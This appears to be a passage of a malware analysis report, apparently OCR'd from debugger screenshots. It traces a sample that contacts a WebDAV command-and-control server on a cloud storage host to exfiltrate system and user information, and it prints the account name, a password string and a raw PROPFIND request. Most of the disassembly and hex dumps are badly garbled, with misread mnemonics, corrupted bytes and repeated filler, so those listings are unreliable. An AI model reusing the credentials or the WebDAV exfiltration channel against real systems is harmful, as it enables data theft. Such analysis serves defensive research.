0007CD14 0007CD14 0007CD15 0007CD16 0007CD16 0007CD16 0007CD16 0007CD16 0007CD16 0007CD16 0007CD16 0007CD16 0007CD16 0007CD16 0007CD16</b>                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44EDC<br>7FF44EDD<br>7FF44EDF<br>7FF44EDF<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF54078<br>7FF58078<br>7FF58078                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>9BEF<br>4D 49 DE 77 A8 7C DD 77 00<br>81 9F 80 7C 5A 13 91 7C E0<br>64 A8 80 7C E1 9A 80 7C 7C<br>84 91 80 7C 65 B4 80 7C 7C<br>87 16 83 7C 6E 2B 81 7C 0I<br>A4 00 91 7C B8 97 80 7C 65<br>80 9B 91 7C 46 2C 81 7C 88<br>FD 49 84 7C 23 31 81 7C 30<br>FA CA 81 7C 17 0E 81 7C 92<br>FA CA 81 7C 17 0E 81 7C 55<br>FD 49 84 7C 29 8C 80 7C 54<br>FD 49 84 7C 23 31 81 7C 30<br>FA CA 81 7C 17 0E 81 7C 55<br>FD 49 84 7C 29 8C 7C 56<br>FD 49 84 7C 29 8C 7C 56<br>FD 49 84 7C 23 31 81 7C 56<br>FD 49 84 7C 23 31 81 7C 56<br>FD 49 84 7C 29 8C 7C 56<br>FD 49 84 7C 29 8C 7C 56<br>FD 49 84 7C 29 8C 7C 56<br>FD 49 84 7C 29 8C 7C 56<br>FD 49 84 7C 26 98 7C 56<br>FD 49 84 7C 26 98 7C 56<br>FD 49 84 7C 26 98 7C 56<br>FD 49 84 7C 26 98 7C 56<br>FD 49 84 7C 26 98 80 7C 56<br>FD 49 84 7C 26 98 80 7C 56<br>FD 49 84 7C 26 98 7C 80 7C 80<br>FD 40 7C 80 7C 80 7C 80 7C 80<br>FD 40 7C 80 7C 80 7C 80 7C 80 7C 80<br>FD 40 7C 80 7C 80 7                                                                                                    | POSH EAX         CALL 7PF468A1         POP ECX         MOU DWORD PTR DS: [ESI], EAX         MOU DWORD PTR DS: [ESI], EAX         MOU DWORD PTR DS: [ESI], EAX         MOU EAX, EDI         JMP SHORT 7FF44EAD         MOU DYO DYO BA 7F DD 77         MOU DYO DYO BA 7F DD 77         O 00 00 07 75 99 80 7C         MI Woll Wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww                                                                                                    | <b>7FF7FBF7 3037CCDC 7FF7FBF7 3007CCE0 7FF7FBF7 8007CCE0 7FF7FBF7 8007CCE0 9007CCE4 9007CCE5 9007CCF0 9007CCF4 9007CCF4 9007CCF5 9007CCF6 9007CCF7 9007CCF6 9007CCF7 9007CD04 9007CD05 9007CD14 9007CD14 9007CD14 9007CD14 9007CD14 9007CD14 9007CD14 9007CD14 9007CD15 9007CD14 9007CD15 9007CD14 9007CD14 9007CD14 9007CD14 9007CD14 9007CD14 9007CD14 9007CD14 9007CD14 9007CD14 9007CD14 9007CD14 9007CD14 9007CD14</b>                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF5407<br>8<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>• EB CA<br>9RFF<br>Hex dump<br>00 00 00 00 00 00 00 00 00 89<br>4D 49 DE 77 A8 7C DD 77 00<br>81 9F 80 7C 5A 13 91 7C E0<br>64 A8 80 7C E1 9A 80 7C C1<br>81 9F 80 7C 65 B4 80 7C C1<br>B7 16 83 7C 6E 2B 81 7C 01<br>A4 00 91 7C B8 97 80 7C 65<br>80 9B 91 7C 46 2C 81 7C 88<br>FD 49 84 7C 23 31 81 7C 30<br>FA CA 81 7C 17 0E 81 7C 55<br>FD 49 84 7C 23 31 81 7C 30<br>FA CA 81 7C 17 0E 81 7C 55<br>FD 49 84 7C 23 31 81 7C 55<br>FD 49 84 7C 23 31 81 7C 55<br>FD 49 84 7C 23 31 81 7C 55<br>FD 49 84 7C 23 31 81 7C 55<br>FF 49 80 7C 77 4B 81 7C 64<br>B7 A4 80 7C 2E 93 80 7C 64<br>B7 A4 80 7C 2E 93 80 7C 63<br>88 9C 80 7C BD 04 91 7C 38<br>12 18 80 7C 1E 0C 81 7C 64<br>12 18 80 7C 1E 0C 81 7C 64<br>12 18 80 7C 1E 0C 81 7C 64<br>12 18 80 7C 1E 0C 81 7C 64<br>12 18 80 7C 1E 0C 81 7C 64<br>12 18 80 7C 1E 0C 81 7C 64<br>12 18 80 7C 1E 0C 81 7C 64<br>12 18 80 7C 1E 0C 81 7C 64<br>12 18 80 7C 1E 0C 81 7C 64<br>12 18 80 7C 1E 0C 81 7C 64<br>12 18 80 7C 1E 0C 81 7C 64<br>12 18 80 7C 1E 0C 81 7C 64<br>12 18 80 7C 1E 0C 81 7C 64<br>12 18 80 7C 1E 0C 81 7C 64<br>13 80 7C 1E 0C 81 7C 64<br>14 7C 64<br>15 80 7C 1E 0C 81 7C 64<br>15 80 7C 80 7C 80 9C 72 80<br>12 18 80 7C 1E 0C 81 7C 64<br>13 80 7C 1E 0C 81 7C 64<br>14 7C 64<br>15 80 7C 1E 0C 81 7C 64<br>15 80 7C 80 7C 80 9C 7C 80<br>15 80 7C 80 7C 80 9C 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 80 7C 80<br>15 80 7C 80 7C 80 80 7C 80<br>15 80 7C 80 7C 80 80 7C 80<br>15 80 7C 80 7C 80 80 7C 80<br>15 80 7C 80 7C 80 80 7C 80<br>15 80 7C 80 7C 80 80 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C 80<br>15 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C 80 7C                                                                                                    | POSH EAX<br>CALL       ?PF46881<br>POP ECX         MOU DWORD PTR DS: [ESI], EAX         MOU EAX, EDI<br>JMP SHORT ?FF44EAD         MOU EAX, EDI<br>JMP SHORT ?FF44EAD         MOU EAX, EDI<br>JMP SHORT ?FF44EAD         MOU EAX, EDI<br>JMP SHORT ?FF44EAD         MOU EAX, EDI<br>JMP SHORT ?FF44EAD         MOU EAX (C) COULD (C) COULD (C)                                                                                                    | <b>7FF7FBF7 3007CCDC 7FF7FBF7 8007CCE0 7FF30000 9007CCE0 7FF30000 9007CCE3 9000000 9007CCE4 9000000 9007CCE5 900000 9007CCF6 900000 9007CCF7 9000 9007CCF8 90004550 9007CCF6 900411D0 9007CD00 471D961E 9007CD04 9000000 9007CD14 90002000 9007CD14 90026000 9007CD15 9000000 9007CD16 900014E13 9007CD24 90001000 9007CD28 90028000 9007CD28 90028000 9007CD28 90028000 9007CD28 90028000 9007CD28 90028000 9007CD28 90028000 9007CD28 90028000 9007CD28 90028000 9007CD28 90028000 9007CD28 90028000 9007CD28 90028000</b>                                                                                                    |                                                                                                    |
| 7FF44EDC<br>7FF44EDC<br>7FF44EDC<br>7FF44EDC<br>7FF44EDC<br>7FF44ED1<br>7FF44ED1<br>7FF544E1<br>7FF57F8<br>7FF57F8<br>7FF58088<br>7FF58088<br>7FF58108<br>7FF58148<br>7FF58148<br>7FF58148                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>• EB CA<br>SREF<br>Hex dump<br>00 00 00 00 00 00 00 00 00 89<br>4D 49 DE 77 A8 7C DD 77 00<br>81 9F 80 7C 5A 13 91 7C E0<br>64 A8 80 7C E1 9A 80 7C 72<br>44 F1 80 7C 65 B4 80 7C 71<br>B7 16 83 7C 6E 2B 81 7C 01<br>A4 00 91 7C B8 97 80 7C 05<br>80 9B 91 7C 46 2C 81 7C 85<br>FD 49 84 7C 23 31 81 7C 30<br>FA CA 81 7C 17 0E 81 7C 55<br>FD 49 84 7C 23 31 81 7C 30<br>FA CA 81 7C 17 0E 81 7C 55<br>FD 49 84 7C 23 31 81 7C 30<br>FA CA 81 7C 17 0E 81 7C 55<br>FD 49 84 7C 23 31 81 7C 65<br>FD 49 84 7C 23 31 81 7C 65<br>FD 49 84 7C 23 31 81 7C 65<br>FD 49 84 7C 26 98 C1 80 7C 56<br>FF 85 80 7C 77 4B 81 7C 64<br>87 A4 80 7C 2E 93 80 7C 85<br>FF 85 80 7C 77 4B 81 7C 63<br>88 9C 80 7C BD 04 91 7C 38<br>12 18 80 7C 1E 0C 81 7C 63<br>38 AC 81 7C 1F 26 81 7C 92                                                                                                    | POSH EAX<br>CALL       7FF46881<br>POP ECX<br>MOU DWORD PTR DS:[ESI],EAX<br>MOU EAX,EDI<br>JMP SHORT ?FF44EAD<br>MOU FNT FNT         MOU EAX,EDI<br>JMP SHORT ?FF44EAD<br>MOU FNT FNT         MOU EAX,EDI<br>JMP SHORT ?FF44EAD         MOU FNT FNT         MOU FNT FNT         980 7C DD 77 BA ?F DD 77<br>000 00 00 78 99 80 7C<br>10 90 7C 00 10 90 7C<br>10 90 7C 00 10 90 7C<br>10 90 7C 60 10 90 7C<br>10 90 7C 60 10 90 7C<br>10 90 7C 60 9F 80 7C<br>34 91 7C AD 2F 81 7C<br>534 91 7C AD 2F 81 7C<br>54 98 80 7C 6A 3E 86 7C<br>10 FF 81 7C AD 2F 81 7C<br>54 88 7C 75 FA 80 7C<br>54 17C DF 33 91 7C<br>54 18 80 7C 6A 3E 86 7C<br>10 2F 81 7C DF 33 91 7C<br>54 18 80 7C 6A 24 80 7C<br>54 18 80 7C 75 81 7C<br>54 18 80 7C 75 81 7C<br>54 18 80 7C<br>54 18 80 7 | <b>7FF7FBF7 3097CCDC 7FF7FBF7 8007CCE0 7FF7BF7 RET</b> 0007CCE4       0000001       0007CCE4         0007CCE5       0000000       0007CCE4         0007CCF0       000A1DD0       0007CCF4         0007CCF4       7FF30000       0007CCF6         0007CCF6       0004014C       0007CD04         0007CD04       0000000       0007CD04         0007CD05       210200E0       0007CD18         0007CD14       00026C00       0007CD18         0007CD15       0000100       0007CD14         0007CD14       0001000       0007CD14         0007CD128       0001000       0007CD24         0007CD24       00001000       0007CD22         0007CD25       1000000       0007CD2         0007CD26       1000000       0007CD26                                                                                                    |                                                                                                    |
| 7FF44EDC<br>7FF44EDC<br>7FF44EDC<br>7FF44EDC<br>7FF44EDL<br>7FF44EDL<br>7FF44EDI<br>7FF542E3<br><b>Address</b><br>7FF57F8<br>7FF58028<br>7FF58028 | 50         50           59         8906           8BC7         *           *         EB CA           SREF         *           Hex dump         *           00         00         00         00         00         00         80           4D         49         DE 77         A8         7C         DD 77         60           81         9F         80         7C         54         13         91         7C         64           44         F1         80         7C         65         84         80         7C         61           81         9F         80         7C         E4         80         7C         61           44         F1         80         7C         65         84         80         7C         61           81         9F         65         84         80         7C         62           80         9B         91         7C         46         2C         81         7C         69           80         9C         17         08         80         7C         59         50         50         50                                                                                                    | POSH EAX<br>CALL       7FF46881<br>POP ECX<br>MOU DWORD PTR DS:[ESI],EAX<br>MOU EAX,EDI<br>JMP SHORT ?FF44EAD<br>MOU FNT FNT         97C DD ??       BA ?F DD ??<br>BA ?F DD ??<br>BA ?F DD ??<br>BA ?F DD ??<br>BA ?F DD ??<br>BA ?F DD ??<br>BA ?F DD ??<br>BA ?F DD ??<br>BA ?F DD ??<br>BA ?F DD ??<br>BA ?F DD ??<br>BA ?F SHORT ?FF44EAD<br>MOU FNT FNT         98 80 ?C 75 FA 80 ?C<br>BA 90 ?C A0 9F 80 ?C<br>BA 91 ?C AD 9F 80 ?C<br>SA 91 ?C AD 2F 81 ?C<br>BA 80 ?C CD E4 80 ?C<br>BA 80 ?C CD E4 80 ?C<br>C 2F 81 ?C DF 33 91 ?C<br>BA 80 ?C CA 32 86 ?C<br>C 2F 81 ?C DF 33 91 ?C<br>BA 80 ?C 46 24 80 ?C<br>C 2F 81 ?C DF 33 91 ?C<br>BA 80 ?C 46 24 80 ?C<br>C 2F 81 ?C DF 33 91 ?C<br>BA 80 ?C 46 24 80 ?C<br>C 2F 81 ?C DF 33 91 ?C<br>C 2F 81 ?C DF 33 91 ?C<br>C 2F 81 ?C DF 33 91 ?C<br>C 2F 81 ?C DF 33 91 ?C<br>C 2F 81 ?C DF 33 91 ?C<br>C 2F 81 ?C DF 33 91 ?C<br>C 2F 31 ?C DF 33 91 ?C<br>C 2F 31 ?C DF 33 91 ?C<br>C 2F 31 ?C DF 33 91 ?C<br>C 2F 31 ?C DF 33 91 ?C<br>C 2F 31 ?C DF 33 91 ?C<br>C 2F 31 ?C DF 33 91 ?C<br>C 2F 31 ?C DF 33 91 ?C<br>C 2F 31 ?C DF 33 91 ?C<br>C 2F 31 ?C DF 33 91 ?C<br>C 2F 31 ?C DF 33 91 ?C<br>C 2F 31 ?C DF 33 91 ?C<br>C 2F 31 ?C DF 33 91 ?C<br>C 2F 31 ?C DF 35 91 ?C<br>C 2F 31 ?C DF 35 91 ?C<br>C 2F 31 ?C DF 35 91 ?C<br>C 2F 31 ?C S5 11 81 ?C<br>D 381 ?C F3 50 87 ?C<br>C 2F 28 31 ?C F3 50 87 ?C<br>C 2F 28 30 ?C F3 50 87 ?C<br>C 2F 28 30 ?C F3 50 87 ?C<br>C 2F 28 30 ?C F3 50 87 ?C<br>C 2F 28 2F 28 ?C<br>C 2F 28 2F 28 ?C 20 75 75 75 75 75 75 75 75 75 75 75 75 75                                                                                                    | <b>7FF7FBF7 395%CCDC 7FF7FBF7 800</b> 7CCE0 <b>7FF7BF7 RET</b> 0007CCE4       0000001         0007CCE5       00000001         0007CCE6       00000001         0007CCF6       00000004         0007CCF7       00011D00         0007CCF8       00004014C         0007CCF6       0004014C         0007CCF7       0004014C         0007CD04       0000000         0007CD05       21020000         0007CD14       0000000         0007CD14       0000000         0007CD15       0000000         0007CD24       00014E13         0007CD24       0001400         0007CD25       1000000         0007CD26       1000000         0007CD27       0001400         0007CD24       0001400         0007CD30       00001400                                                                                                    |                                                                                                    |

Finally we can see it's connecting to webday.cloudme.com and cleartext credentials in following screenshot.

| 71B24AC4 8BFF                                                                                                    | MOU EDI, EDI                                                                                                    | WNetAddConnection2A 🔨 Registers (FPU) 🔇                                                                                                    |
|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|
| 71B24AC6 55<br>71B24AC7 8BEC<br>71B24AC7 33C0<br>71B24ACB 50<br>71B24ACC 50<br>71B24ACC 50<br>71B24ACC 50<br>71B24ACE FF75 14<br>71B24ACE FF75 10<br>71B24AD1 FF75 10<br>71B24AD4 FF75 0<br>21B24AD4 FF75 0 | PUSH EBP<br>MOU EBP_ESP<br>XOR EAX_EAX<br>PUSH EAX<br>PUSH EAX<br>PUSH EAX<br>PUSH EAX<br>PUSH DWORD PTR SS:[EBP+14]<br>PUSH DWORD PTR SS:[EBP+10]<br>PUSH DWORD PTR SS:[ERP+C] | EAX 00E93E20 ASCII<br>ECX 00E93E5 ASCII<br>EDX 00E93E5 ASCII<br>"amK00""<br>"amK00"""<br>"amK00"""<br>"amK00""""<br>"amK00"""<br>"amK00"""<br>"amK00"""<br>"amK00""""<br>"amK00""""<br>"amK00""""<br>"amK00""""<br>"amK00""""<br>"amK00""""<br>"amK00"""""""<br>"amK00""""""""""""""""""""""""""""""""""      |
| Address Hex dump                                                                                                    | ASCI I 🔥 0007D1C0                                                                                                    | 7FF51CC3 RETURN to 7FF51CC3 from 7FF57BB4                                                                                                    |
| $\begin{array}{c c c c c c c c c c c c c c c c c c c $                                                                                                    | $\begin{array}{c} 0 & 00 & 00 & 00 & 00 & 00 & 00 & 00 $                                                                                                    | 00073155         ASCII         "amK00         "- Password           000731557         ASCII         "binm4276"         -           0007000         ASCII         "binm4276"         -           0000000         00000000         -         -           00000000         00000000         -         -           00000000         -         -         -           00000000         -         -         -           00000000         -         -         -           00000000         -         -         -           00000000         -         -         -           00000000         -         -         -           00000000         -         -         -           00000000         -         -         -           00000000         -         -         -           00000000         -         -         -         -           00000000         -         -         -         -           00000000         -         -         -         -           00000000         -         -         -         -           000000000         -         - |
| 0007D308 00 00 00 00 D2 07 00 7<br>0007D318 70 42 F4 7F 25 98 B4 DE F<br>0007D328 B7 12 F3 7F 44 D3 07 00 5                                                                                                 | C 3D E9 00 B4 D3 07 00                                                                                                    | 3 7FF51F6F <u>RETURN to 2FF51F6F from 7FF51C40</u><br>00E93DA0 ASCII "http://webdav.cloudme.com/binm4276/CloudDrive/"<br>00E93E20 ASCII "binm4276"                                                                                                    |
| 0007D338 01 00 00 00 00 00 F7 7F H                                                                                                    | E FF FF FF 40 F0 09 00 00                                                                                                    | 4 0007D22C                                                                                                    |

Malware tries to communicate with the user account created at the WebDAV C&C to exfiltrate system and user information.

PROPFIND /bimm4276/CloudDrive/OqkOVtkX9xqZ8tAAGt/pgpHnoeA68tQIBd\_T3 HTTP/1.1 Depth: 0 translate: f User-Agent: Microsoft-webDAV-MiniRedir/5.1.2600 Host: webdav.cloudme.com Content-Length: 0 Connection: Keep-Alive Authorization: Digest username="bimm4276", "/bimm4276/

Reference:

https://www.bluecoat.com/security-blog/2014-12-09/blue-coat-exposes-%E2%80%9C-

inception-framework%E2%80%9D-very-sophisticated-layered-malware